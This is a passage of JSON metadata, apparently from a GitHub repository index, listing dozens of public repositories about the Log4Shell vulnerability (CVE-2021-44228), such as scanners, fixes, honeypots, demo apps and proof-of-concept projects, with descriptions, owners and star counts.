+ "description": "Identifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T10:49:36Z",
+ "updated_at": "2022-01-12T12:25:17Z",
+ "pushed_at": "2021-12-20T06:29:15Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438595299,
+ "name": "log4j-CVE-2021-44228",
+ "full_name": "kubearmor\/log4j-CVE-2021-44228",
+ "owner": {
+ "login": "kubearmor",
+ "id": 86793284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86793284?v=4",
+ "html_url": "https:\/\/github.com\/kubearmor"
+ },
+ "html_url": "https:\/\/github.com\/kubearmor\/log4j-CVE-2021-44228",
+ "description": "Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T10:55:35Z",
+ "updated_at": "2022-08-08T14:05:52Z",
+ "pushed_at": "2021-12-15T16:29:14Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 438600716,
+ "name": "logpresso-CVE-2021-44228-Scanner",
+ "full_name": "jyotisahu98\/logpresso-CVE-2021-44228-Scanner",
+ "owner": {
+ "login": "jyotisahu98",
+ "id": 96179721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96179721?v=4",
+ "html_url": "https:\/\/github.com\/jyotisahu98"
+ },
+ "html_url": "https:\/\/github.com\/jyotisahu98\/logpresso-CVE-2021-44228-Scanner",
+ "description": "Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T11:15:25Z",
+ "updated_at": "2021-12-27T14:28:30Z",
+ "pushed_at": "2021-12-15T11:15:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438605924,
+ "name": "log4j-resources",
+ "full_name": "gitlab-de\/log4j-resources",
+ "owner": {
+ "login": "gitlab-de",
+ "id": 75491323,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75491323?v=4",
+ "html_url": "https:\/\/github.com\/gitlab-de"
+ },
+ "html_url": "https:\/\/github.com\/gitlab-de\/log4j-resources",
+ "description": "This repository is designed to be a collection of resources to learn about, detect and mitigate the impact of the Log4j vulnerability - more formally known as CVE-2021-44228 and CVE-2021-45046 (mirror from GitLab.com)",
+ "fork": false,
+ "created_at": "2021-12-15T11:34:02Z",
+ "updated_at": "2021-12-18T15:25:17Z",
+ "pushed_at": "2021-12-18T15:25:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "log4j"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438615335,
+ "name": "Log4JHunt",
+ "full_name": "redhuntlabs\/Log4JHunt",
+ "owner": {
+ "login": "redhuntlabs",
+ "id": 36505047,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36505047?v=4",
+ "html_url": "https:\/\/github.com\/redhuntlabs"
+ },
+ "html_url": "https:\/\/github.com\/redhuntlabs\/Log4JHunt",
+ "description": "An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-15T12:07:05Z",
+ "updated_at": "2024-05-11T11:36:22Z",
+ "pushed_at": "2021-12-17T07:41:47Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438635569,
+ "name": "log4shell-hotfix-side-effect",
+ "full_name": "mss\/log4shell-hotfix-side-effect",
+ "owner": {
+ "login": "mss",
+ "id": 5391,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5391?v=4",
+ "html_url": "https:\/\/github.com\/mss"
+ },
+ "html_url": "https:\/\/github.com\/mss\/log4shell-hotfix-side-effect",
+ "description": "Test case to check if the Log4Shell\/CVE-2021-44228 hotfix will raise any unexpected exceptions",
+ "fork": false,
+ "created_at": "2021-12-15T13:14:34Z",
+ "updated_at": "2023-02-28T20:50:34Z",
+ "pushed_at": "2021-12-18T12:02:09Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "java",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438664340,
+ "name": "log4j-vuln-coverage-check",
+ "full_name": "MeterianHQ\/log4j-vuln-coverage-check",
+ "owner": {
+ "login": "MeterianHQ",
+ "id": 28596672,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28596672?v=4",
+ "html_url": "https:\/\/github.com\/MeterianHQ"
+ },
+ "html_url": "https:\/\/github.com\/MeterianHQ\/log4j-vuln-coverage-check",
+ "description": "A simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)",
+ "fork": false,
+ "created_at": "2021-12-15T14:44:14Z",
+ "updated_at": "2021-12-16T14:00:05Z",
+ "pushed_at": "2022-12-01T09:18:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438680847,
+ "name": "jmeter-fix-cve-2021-44228-windows",
+ "full_name": "sebiboga\/jmeter-fix-cve-2021-44228-windows",
+ "owner": {
+ "login": "sebiboga",
+ "id": 41440889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41440889?v=4",
+ "html_url": "https:\/\/github.com\/sebiboga"
+ },
+ "html_url": "https:\/\/github.com\/sebiboga\/jmeter-fix-cve-2021-44228-windows",
+ "description": "fix cve 44228 for windows",
+ "fork": false,
+ "created_at": "2021-12-15T15:34:19Z",
+ "updated_at": "2021-12-15T15:50:19Z",
+ "pushed_at": "2021-12-15T15:51:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438683307,
+ "name": "log4shell-cloud-scanner",
+ "full_name": "mitiga\/log4shell-cloud-scanner",
+ "owner": {
+ "login": "mitiga",
+ "id": 82891013,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82891013?v=4",
+ "html_url": "https:\/\/github.com\/mitiga"
+ },
+ "html_url": "https:\/\/github.com\/mitiga\/log4shell-cloud-scanner",
+ "description": "we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them",
+ "fork": false,
+ "created_at": "2021-12-15T15:42:06Z",
+ "updated_at": "2022-01-04T14:01:16Z",
+ "pushed_at": "2021-12-17T16:00:03Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 438689577,
+ "name": "Log4j",
+ "full_name": "isuruwa\/Log4j",
+ "owner": {
+ "login": "isuruwa",
+ "id": 72663288,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72663288?v=4",
+ "html_url": "https:\/\/github.com\/isuruwa"
+ },
+ "html_url": "https:\/\/github.com\/isuruwa\/Log4j",
+ "description": "A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228 ",
+ "fork": false,
+ "created_at": "2021-12-15T16:01:36Z",
+ "updated_at": "2023-09-28T11:34:09Z",
+ "pushed_at": "2022-08-06T15:26:04Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "java",
+ "log4j"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438692384,
+ "name": "log4shell-data",
+ "full_name": "honeynet\/log4shell-data",
+ "owner": {
+ "login": "honeynet",
+ "id": 3327517,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3327517?v=4",
+ "html_url": "https:\/\/github.com\/honeynet"
+ },
+ "html_url": "https:\/\/github.com\/honeynet\/log4shell-data",
+ "description": "Data we are receiving from our honeypots about CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T16:10:54Z",
+ "updated_at": "2022-10-14T09:19:33Z",
+ "pushed_at": "2021-12-16T16:08:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 438695688,
+ "name": "checkmk-log4j-scanner",
+ "full_name": "inettgmbh\/checkmk-log4j-scanner",
+ "owner": {
+ "login": "inettgmbh",
+ "id": 12827152,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12827152?v=4",
+ "html_url": "https:\/\/github.com\/inettgmbh"
+ },
+ "html_url": "https:\/\/github.com\/inettgmbh\/checkmk-log4j-scanner",
+ "description": "Scans for Log4j versions effected by CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T16:21:26Z",
+ "updated_at": "2024-05-13T12:42:03Z",
+ "pushed_at": "2024-05-13T12:44:51Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "checkmk",
+ "log4j"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 438719808,
+ "name": "CVE-2021-44228",
+ "full_name": "b1tm0n3r\/CVE-2021-44228",
+ "owner": {
+ "login": "b1tm0n3r",
+ "id": 61518601,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61518601?v=4",
+ "html_url": "https:\/\/github.com\/b1tm0n3r"
+ },
+ "html_url": "https:\/\/github.com\/b1tm0n3r\/CVE-2021-44228",
+ "description": "CVE-2021-44228 demo webapp",
+ "fork": false,
+ "created_at": "2021-12-15T17:42:13Z",
+ "updated_at": "2021-12-20T19:25:27Z",
+ "pushed_at": "2021-12-20T19:25:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438739105,
+ "name": "CVE-2021-44228-Log4j",
+ "full_name": "VerveIndustrialProtection\/CVE-2021-44228-Log4j",
+ "owner": {
+ "login": "VerveIndustrialProtection",
+ "id": 96202973,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96202973?v=4",
+ "html_url": "https:\/\/github.com\/VerveIndustrialProtection"
+ },
+ "html_url": "https:\/\/github.com\/VerveIndustrialProtection\/CVE-2021-44228-Log4j",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T18:51:07Z",
+ "updated_at": "2022-01-01T14:37:49Z",
+ "pushed_at": "2022-01-04T21:10:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438745261,
+ "name": "log4j",
+ "full_name": "alenazi90\/log4j",
+ "owner": {
+ "login": "alenazi90",
+ "id": 3836915,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3836915?v=4",
+ "html_url": "https:\/\/github.com\/alenazi90"
+ },
+ "html_url": "https:\/\/github.com\/alenazi90\/log4j",
+ "description": "An automated header extensive scanner for detecting log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T19:15:00Z",
+ "updated_at": "2021-12-16T15:10:52Z",
+ "pushed_at": "2021-12-15T19:21:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438747026,
+ "name": "log4j-cve-2021-44228",
+ "full_name": "pmontesd\/log4j-cve-2021-44228",
+ "owner": {
+ "login": "pmontesd",
+ "id": 8183561,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8183561?v=4",
+ "html_url": "https:\/\/github.com\/pmontesd"
+ },
+ "html_url": "https:\/\/github.com\/pmontesd\/log4j-cve-2021-44228",
+ "description": "Very simple Ansible playbook that scan filesystem for JAR files vulnerable to Log4Shell",
+ "fork": false,
+ "created_at": "2021-12-15T19:21:39Z",
+ "updated_at": "2022-01-12T13:13:44Z",
+ "pushed_at": "2021-12-15T20:39:16Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438756678,
+ "name": "log4shell",
+ "full_name": "LiveOverflow\/log4shell",
+ "owner": {
+ "login": "LiveOverflow",
+ "id": 12161158,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4",
+ "html_url": "https:\/\/github.com\/LiveOverflow"
+ },
+ "html_url": "https:\/\/github.com\/LiveOverflow\/log4shell",
+ "description": "Small example repo for looking into log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T19:59:38Z",
+ "updated_at": "2023-10-25T02:35:11Z",
+ "pushed_at": "2021-12-24T15:44:53Z",
+ "stargazers_count": 66,
+ "watchers_count": 66,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 66,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438761150,
+ "name": "kubernetes-log4j-cve-2021-44228-node-agent",
+ "full_name": "aws-samples\/kubernetes-log4j-cve-2021-44228-node-agent",
+ "owner": {
+ "login": "aws-samples",
+ "id": 8931462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8931462?v=4",
+ "html_url": "https:\/\/github.com\/aws-samples"
+ },
+ "html_url": "https:\/\/github.com\/aws-samples\/kubernetes-log4j-cve-2021-44228-node-agent",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T20:17:41Z",
+ "updated_at": "2023-10-19T15:47:11Z",
+ "pushed_at": "2022-08-26T14:56:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 438773632,
+ "name": "Log4Shell-Honeypot",
+ "full_name": "michaelsanford\/Log4Shell-Honeypot",
+ "owner": {
+ "login": "michaelsanford",
+ "id": 1800499,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1800499?v=4",
+ "html_url": "https:\/\/github.com\/michaelsanford"
+ },
+ "html_url": "https:\/\/github.com\/michaelsanford\/Log4Shell-Honeypot",
+ "description": "Dockerized honeypot for CVE-2021-44228.",
+ "fork": false,
+ "created_at": "2021-12-15T21:09:00Z",
+ "updated_at": "2023-06-22T04:46:02Z",
+ "pushed_at": "2024-06-18T17:33:19Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "docker",
+ "honeypot",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438791130,
+ "name": "Log4Pot",
+ "full_name": "thomaspatzke\/Log4Pot",
+ "owner": {
+ "login": "thomaspatzke",
+ "id": 1845601,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1845601?v=4",
+ "html_url": "https:\/\/github.com\/thomaspatzke"
+ },
+ "html_url": "https:\/\/github.com\/thomaspatzke\/Log4Pot",
+ "description": "A honeypot for the Log4Shell vulnerability (CVE-2021-44228).",
+ "fork": false,
+ "created_at": "2021-12-15T22:30:34Z",
+ "updated_at": "2024-05-29T08:53:32Z",
+ "pushed_at": "2022-04-26T14:30:54Z",
+ "stargazers_count": 88,
+ "watchers_count": 88,
+ "has_discussions": true,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 88,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 438797049,
+ "name": "cve-2021-44228-rce-poc",
+ "full_name": "ubitech\/cve-2021-44228-rce-poc",
+ "owner": {
+ "login": "ubitech",
+ "id": 998323,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/998323?v=4",
+ "html_url": "https:\/\/github.com\/ubitech"
+ },
+ "html_url": "https:\/\/github.com\/ubitech\/cve-2021-44228-rce-poc",
+ "description": "A Remote Code Execution PoC for Log4Shell (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-15T23:00:25Z",
+ "updated_at": "2024-04-19T14:29:37Z",
+ "pushed_at": "2021-12-15T23:03:44Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 438825521,
+ "name": "log4v-vuln-check",
+ "full_name": "rv4l3r3\/log4v-vuln-check",
+ "owner": {
+ "login": "rv4l3r3",
+ "id": 90338959,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90338959?v=4",
+ "html_url": "https:\/\/github.com\/rv4l3r3"
+ },
+ "html_url": "https:\/\/github.com\/rv4l3r3\/log4v-vuln-check",
+ "description": "This script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerability).",
+ "fork": false,
+ "created_at": "2021-12-16T01:38:25Z",
+ "updated_at": "2021-12-20T22:11:34Z",
+ "pushed_at": "2021-12-20T22:11:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438853805,
+ "name": "log4j_scanner_wrapper",
+ "full_name": "dpomnean\/log4j_scanner_wrapper",
+ "owner": {
+ "login": "dpomnean",
+ "id": 17032114,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17032114?v=4",
+ "html_url": "https:\/\/github.com\/dpomnean"
+ },
+ "html_url": "https:\/\/github.com\/dpomnean\/log4j_scanner_wrapper",
+ "description": "log4j vulnerability wrapper scanner for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-16T03:57:41Z",
+ "updated_at": "2021-12-17T15:23:34Z",
+ "pushed_at": "2021-12-16T14:10:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438920047,
+ "name": "CVE-2021-44228",
+ "full_name": "roxas-tan\/CVE-2021-44228",
+ "owner": {
+ "login": "roxas-tan",
+ "id": 63656689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63656689?v=4",
+ "html_url": "https:\/\/github.com\/roxas-tan"
+ },
+ "html_url": "https:\/\/github.com\/roxas-tan\/CVE-2021-44228",
+ "description": "This Log4j RCE exploit originated from https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce",
+ "fork": false,
+ "created_at": "2021-12-16T08:46:55Z",
+ "updated_at": "2023-11-29T06:51:14Z",
+ "pushed_at": "2021-12-16T08:59:14Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438931405,
+ "name": "CVE-2021-44228",
+ "full_name": "shamo0\/CVE-2021-44228",
+ "owner": {
+ "login": "shamo0",
+ "id": 48299520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4",
+ "html_url": "https:\/\/github.com\/shamo0"
+ },
+ "html_url": "https:\/\/github.com\/shamo0\/CVE-2021-44228",
+ "description": "log4shell (CVE-2021-44228) scanning tool",
+ "fork": false,
+ "created_at": "2021-12-16T09:26:37Z",
+ "updated_at": "2023-09-28T11:34:10Z",
+ "pushed_at": "2021-12-16T10:00:15Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2021",
+ "44228",
+ "apache",
+ "code",
+ "cve",
+ "cve-2021-44228",
+ "execution",
+ "exploit",
+ "log",
+ "log4j",
+ "log4j2",
+ "log4shell",
+ "logging",
+ "poc",
+ "rce",
+ "remote",
+ "scanner",
+ "scanning",
+ "tool"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438940454,
+ "name": "log4j-Scan-Burpsuite",
+ "full_name": "snow0715\/log4j-Scan-Burpsuite",
+ "owner": {
+ "login": "snow0715",
+ "id": 54879520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54879520?v=4",
+ "html_url": "https:\/\/github.com\/snow0715"
+ },
+ "html_url": "https:\/\/github.com\/snow0715\/log4j-Scan-Burpsuite",
+ "description": "Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件",
+ "fork": false,
+ "created_at": "2021-12-16T09:58:02Z",
+ "updated_at": "2024-04-07T08:54:48Z",
+ "pushed_at": "2022-01-26T03:51:30Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438951347,
+ "name": "Log4j-Windows-Scanner",
+ "full_name": "Joefreedy\/Log4j-Windows-Scanner",
+ "owner": {
+ "login": "Joefreedy",
+ "id": 47759132,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47759132?v=4",
+ "html_url": "https:\/\/github.com\/Joefreedy"
+ },
+ "html_url": "https:\/\/github.com\/Joefreedy\/Log4j-Windows-Scanner",
+ "description": "CVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.",
+ "fork": false,
+ "created_at": "2021-12-16T10:37:16Z",
+ "updated_at": "2022-03-29T19:51:54Z",
+ "pushed_at": "2022-10-05T11:18:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438971911,
+ "name": "log4fix",
+ "full_name": "Nanitor\/log4fix",
+ "owner": {
+ "login": "Nanitor",
+ "id": 6453685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6453685?v=4",
+ "html_url": "https:\/\/github.com\/Nanitor"
+ },
+ "html_url": "https:\/\/github.com\/Nanitor\/log4fix",
+ "description": "Detect and fix log4j log4shell vulnerability (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-16T11:54:11Z",
+ "updated_at": "2022-09-22T23:48:42Z",
+ "pushed_at": "2021-12-24T13:08:46Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 438979039,
+ "name": "scanlist-log4j",
+ "full_name": "Gyrfalc0n\/scanlist-log4j",
+ "owner": {
+ "login": "Gyrfalc0n",
+ "id": 46728024,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46728024?v=4",
+ "html_url": "https:\/\/github.com\/Gyrfalc0n"
+ },
+ "html_url": "https:\/\/github.com\/Gyrfalc0n\/scanlist-log4j",
+ "description": "Simple bash script to scan multiples url for log4j vulnerability (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-16T12:20:00Z",
+ "updated_at": "2021-12-20T15:36:11Z",
+ "pushed_at": "2022-01-12T08:53:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438985997,
+ "name": "log4shell-demo",
+ "full_name": "korteke\/log4shell-demo",
+ "owner": {
+ "login": "korteke",
+ "id": 2558348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2558348?v=4",
+ "html_url": "https:\/\/github.com\/korteke"
+ },
+ "html_url": "https:\/\/github.com\/korteke\/log4shell-demo",
+ "description": "Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-16T12:44:24Z",
+ "updated_at": "2021-12-22T12:14:02Z",
+ "pushed_at": "2023-02-13T22:30:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438992218,
+ "name": "vuln_spring_log4j2",
+ "full_name": "recanavar\/vuln_spring_log4j2",
+ "owner": {
+ "login": "recanavar",
+ "id": 9977753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9977753?v=4",
+ "html_url": "https:\/\/github.com\/recanavar"
+ },
+ "html_url": "https:\/\/github.com\/recanavar\/vuln_spring_log4j2",
+ "description": "Simple Vulnerable Spring Boot Application to Test the CVE-2021-44228 ",
+ "fork": false,
